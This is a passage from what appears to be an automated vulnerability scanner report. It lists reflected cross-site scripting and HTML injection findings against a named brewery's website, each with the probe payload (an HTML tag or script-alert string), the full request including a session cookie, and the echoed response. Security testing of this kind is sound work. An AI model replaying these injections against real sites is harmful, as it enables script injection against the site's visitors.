Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="companye706a"><a>c8816d8ff3f_page" class="companye706a">
...[SNIP]...

1.178. http://www.ninkasibrewing.com/company/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /company/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c8fc"><a>5627c06183b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /company5c8fc"><a>5627c06183b/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="company5c8fc"><a>5627c06183b_page" class="company5c8fc">
...[SNIP]...

1.179. http://www.ninkasibrewing.com/company/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /company/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ca1b"><a>883628057d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /company7ca1b"><a>883628057d0/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="company7ca1b"><a>883628057d0_page" class="company7ca1b">
...[SNIP]...

1.180. http://www.ninkasibrewing.com/company/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /company/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f15af"><a>10c219e5d62 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /companyf15af"><a>10c219e5d62/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="companyf15af"><a>10c219e5d62_page" class="companyf15af">
...[SNIP]...

1.181. http://www.ninkasibrewing.com/company/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /company/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95cc6"><a>4a3776524c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /company95cc6"><a>4a3776524c8/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="company95cc6"><a>4a3776524c8_page" class="company95cc6">
...[SNIP]...

1.182. http://www.ninkasibrewing.com/contact/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /contact/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3673a"><a>3f6d411eb9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contact3673a"><a>3f6d411eb9a/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contact3673a"><a>3f6d411eb9a_page" class="contact3673a">
...[SNIP]...

1.183. http://www.ninkasibrewing.com/contact/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a1f4"><script>alert(1)</script>795f4542f78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/?4a1f4"><script>alert(1)</script>795f4542f78=1 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/?4a1f4"><script>alert(1)</script>795f4542f78=1" method="post">
...[SNIP]...

1.184. http://www.ninkasibrewing.com/contact/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d20c6"><a>9742955dd12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contactd20c6"><a>9742955dd12/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contactd20c6"><a>9742955dd12_page" class="contactd20c6">
...[SNIP]...

1.185. http://www.ninkasibrewing.com/contact/content/css/basic.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/basic.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efd65"><script>alert(1)</script>ad60b82afba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/contentefd65"><script>alert(1)</script>ad60b82afba/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/contentefd65"><script>alert(1)</script>ad60b82afba/css/basic.css" method="post">
...[SNIP]...

1.186. http://www.ninkasibrewing.com/contact/content/css/basic.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/basic.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42b42"><script>alert(1)</script>5fe47e91d14 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/css42b42"><script>alert(1)</script>5fe47e91d14/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/css42b42"><script>alert(1)</script>5fe47e91d14/basic.css" method="post">
...[SNIP]...

1.187. http://www.ninkasibrewing.com/contact/content/css/basic.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/basic.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8dca"><script>alert(1)</script>7f9c03b7e41 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/css/basic.cssa8dca"><script>alert(1)</script>7f9c03b7e41 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/css/basic.cssa8dca"><script>alert(1)</script>7f9c03b7e41" method="post">
...[SNIP]...

1.188. http://www.ninkasibrewing.com/contact/content/css/basic.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/basic.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 980af"><script>alert(1)</script>56ae7003a68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/css/basic.css?980af"><script>alert(1)</script>56ae7003a68=1 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/css/basic.css?980af"><script>alert(1)</script>56ae7003a68=1" method="post">
...[SNIP]...

1.189. http://www.ninkasibrewing.com/contact/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58806"><a>7369f1313b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contact58806"><a>7369f1313b0/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contact58806"><a>7369f1313b0_page" class="contact58806">
...[SNIP]...

1.190. http://www.ninkasibrewing.com/contact/content/css/ninkasi.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c274"><script>alert(1)</script>f1c489d6303 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content2c274"><script>alert(1)</script>f1c489d6303/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content2c274"><script>alert(1)</script>f1c489d6303/css/ninkasi.css" method="post">
...[SNIP]...

1.191. http://www.ninkasibrewing.com/contact/content/css/ninkasi.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82f7e"><script>alert(1)</script>9aa410def61 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/css82f7e"><script>alert(1)</script>9aa410def61/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/css82f7e"><script>alert(1)</script>9aa410def61/ninkasi.css" method="post">
...[SNIP]...

1.192. http://www.ninkasibrewing.com/contact/content/css/ninkasi.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cd3d"><script>alert(1)</script>7317fbbfebc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/css/ninkasi.css6cd3d"><script>alert(1)</script>7317fbbfebc HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/css/ninkasi.css6cd3d"><script>alert(1)</script>7317fbbfebc" method="post">
...[SNIP]...

1.193. http://www.ninkasibrewing.com/contact/content/css/ninkasi.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/ninkasi.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75689"><script>alert(1)</script>73fec1f51e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/css/ninkasi.css?75689"><script>alert(1)</script>73fec1f51e1=1 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/css/ninkasi.css?75689"><script>alert(1)</script>73fec1f51e1=1" method="post">
...[SNIP]...

1.194. http://www.ninkasibrewing.com/contact/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c04d"><a>af08b404133 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contact3c04d"><a>af08b404133/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contact3c04d"><a>af08b404133_page" class="contact3c04d">
...[SNIP]...

1.195. http://www.ninkasibrewing.com/contact/content/css/print.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/print.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 491d9"><script>alert(1)</script>1368f5426b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content491d9"><script>alert(1)</script>1368f5426b7/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
